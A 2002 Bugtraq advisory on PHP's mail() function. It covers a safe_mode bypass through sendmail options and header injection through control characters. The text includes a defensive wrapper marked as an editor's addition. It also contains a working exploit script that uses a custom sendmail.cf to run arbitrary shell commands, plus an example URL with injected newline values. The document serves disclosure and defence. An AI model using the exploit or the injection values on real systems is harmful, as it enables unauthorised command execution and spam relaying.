PHP: Bypass safe_mode and inject ASCII control chars with mail()

From: Wojciech Purczynski (cliph@isec.pl)
Date: 08/23/02


Date: Fri, 23 Aug 2002 09:30:40 +0200 (CEST)
From: Wojciech Purczynski <cliph@isec.pl>
To: bugtraq@securityfocus.com


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product: PHP
Version: 4.x up to 4.2.2
Vendor: http://www.php.net/
Author: Wojciech Purczynski <cliph@isec.pl>
Date: June 13, 2002
Updated: August 23, 2002
Released: August 21, 2002

Issue:
======

Two vulnerabilities exist in the PHP mail() function. The first allows
executing any program or script, bypassing the safe_mode restriction; the
second may turn a PHP script into an open relay if mail() is not used
carefully.

Description:
============

PHP is a widely-used general-purpose scripting language that is especially
suited for Web development and can be embedded into HTML.

Details:
========

(1) Bypassing safe_mode restriction

If PHP is configured with the safe_mode option enabled, special restrictions
are set up, including a limit on which external binaries may be executed
from within a PHP script.

The 5th argument to the mail() function (introduced in version 4.0.5)
allows specifying command-line options for the sendmail binary. Some time
ago a bug was found in the mail() function that allowed shell
meta-characters to be passed in the 5th argument, leading to execution of
arbitrary shell commands or external binaries. This bug was fixed in
version 4.1.0.

However, the mail() function is still vulnerable because it allows
command-line arguments to be passed to the sendmail binary, which gives the
ability to influence its behavior (e.g. by using non-default aliases or a
custom configuration file; other cases are possible with other MTAs).

Passing the 5th argument should be disabled if PHP is configured in
safe_mode.

Exploit attached at the end.

(2) Injecting ASCII control characters into mail() arguments

Arbitrary ASCII control characters may be injected into the string
arguments of the mail() function. If mail() arguments are taken from user
input, this may give the user the ability to alter the message content,
including mail headers.

Example of such a vulnerability may be found on PHP.net site:

(URL wrapped for readability)
http://www.php.net/mailing-lists.php?
        maillist=your@email.com%0a&email=fake@from.net%0a

PHP should filter control characters out of these arguments before creating
the message that is piped to the "sendmail -t" command.
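To make both recommendations concrete, here is an added example (not part of
the advisory, and not PHP's or iSEC's code) of a script-level wrapper that
refuses control characters in every mail() argument and only ever builds a
validated -f option for the 5th argument. The function names and the sample
inputs are the editor's own assumptions; the inputs are constructed to
mirror the %0a in the php.net URL above.

```php
<?php
// Added example, not code from the advisory or from PHP: a script-level
// wrapper around mail() that addresses both issues described above.
// Function names (safe_mail_params, build_message, ...) are assumptions.

// Issue (2): any CR, LF, NUL or other ASCII control character in a value
// that ends up in the header block lets the caller start a new header line
// in the message PHP pipes to "sendmail -t".
function has_control_chars($value) {
    return preg_match('/[\x00-\x1f\x7f]/', $value) === 1;
}

// Conservative address check. The D modifier matters: without it, "$" also
// matches before a trailing "\n", so "fake@from.net\n" would pass the regex.
function is_plain_address($addr) {
    return !has_control_chars($addr)
        && preg_match('/^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$/D', $addr) === 1;
}

// Issue (1): the 5th mail() argument is an option string for sendmail.
// A web script normally needs only -f (envelope sender), so build that one
// option from a validated address and never accept a free-form string such
// as "-C/tmp/cf". "-f" and the address form one token, so the address can
// never be parsed as a separate option. Returns false for anything else.
function safe_mail_params($envelope_from) {
    if (!is_plain_address($envelope_from)) {
        return false;
    }
    return '-f' . $envelope_from;
}

// Assemble To/Subject/extra headers the way they reach "sendmail -t", so
// the effect of each input is visible without sending mail. Returns false
// when any value fails validation.
function build_message($to, $subject, $body, $from) {
    if (!is_plain_address($to) || !is_plain_address($from)
        || has_control_chars($subject)) {
        return false;
    }
    $headers = "From: $from\r\nX-Mailer: PHP";
    return "To: $to\r\nSubject: $subject\r\n$headers\r\n\r\n$body";
}

// Vulnerable shape, for contrast (do not use):
//   mail($maillist, "subscribe", $body, "From: $email");
// with $maillist and $email taken straight from the query string, as in
// the php.net URL quoted in the advisory.

// Constructed inputs: the php.net-style injection (%0a decoded to "\n"),
// a CR variant, a NUL-truncation attempt, a trailing newline, and a
// legitimate address.
$from_values = array(
    "fake@from.net\nBcc: spam-target@example.net",
    "fake@from.net\rCc: other@example.net",
    "fake@from.net\0-oQ/tmp",
    "fake@from.net\n",
    "user@example.org",
);
foreach ($from_values as $from) {
    $msg = build_message("list@example.org", "subscribe", "add me", $from);
    printf("%-45s -> %s\n", addcslashes($from, "\0..\37"),
           $msg === false ? "rejected" : "accepted");
}

// Option string for the 5th argument: only a validated -f is ever produced.
foreach (array("-C/tmp/cf", "user@example.org -C/tmp/cf", "user@example.org") as $p) {
    $opt = safe_mail_params($p);
    printf("%-30s -> %s\n", $p, $opt === false ? "rejected" : $opt);
}

// Real use: call mail() only once every value has been validated.
//   if ($msg !== false && ($opt = safe_mail_params($from)) !== false) {
//       mail($to, $subject, $body, "From: $from", $opt);
//   }
?>
```

The point of rejecting rather than stripping is that a stripped "\n" silently
changes the meaning of the request (the injected header disappears, but so
does any evidence of the attempt); a rejection can be logged. Keeping the
option string to a single, script-built "-f" token is what makes the 5th
argument safe regardless of whether safe_mode is on.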

Impact:
=======

(1) Any user may bypass safe_mode restrictions if the mail() function is not
    disabled.
(2) A PHP script becomes an open relay if user data is passed to the mail()
    function unfiltered or poorly filtered.

Exploit:
========

Sample exploit for (1) that works with the sendmail MTA:

-----8<----- bypass_safe_mode.php -----8<-----
<?php
// $cmd is the shell command to run. The exploit expects the caller to
// supply it (e.g. ?cmd=id with register_globals on, as was common in
// PHP 4), so it is deliberately not set here.
$script=tempnam("/tmp", "script");
$cf=tempnam("/tmp", "cf");

// Minimal sendmail.cf: queue directory in /tmp, a "parse" ruleset (0) that
// resolves every recipient to the "local" mailer, and a "local" mailer
// that is really /bin/sh running our script.
$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);

// The script removes both temporary files, then runs the command.
$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);

// -C makes sendmail read our configuration file instead of the system one.
// Since 4.1.0 PHP escapes shell meta-characters in this argument, but it
// still passes options through, even under safe_mode.
mail("nobody", "", "", "", "-C$cf");
?>
-----8<----- bypass_safe_mode.php -----8<-----

Fix:
====

(1) has been fixed in the latest CVS snapshot. The fix for (2) is not
sufficient: it is still possible to inject ASCII control characters that
cause the argument string to be truncated. Please refer to the example URL
mentioned above.

These bugs have not yet been fixed in the latest stable release, 4.2.2.

--
Wojciech Purczynski
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9ZeSsC+8U3Z5wpu4RAsqBAKC04X7sCrcOQOXjpXgPqDXQjUEufgCfcokE
5n+9UMdQVqw1HYdh2opFsjY=
=iKiW
-----END PGP SIGNATURE-----
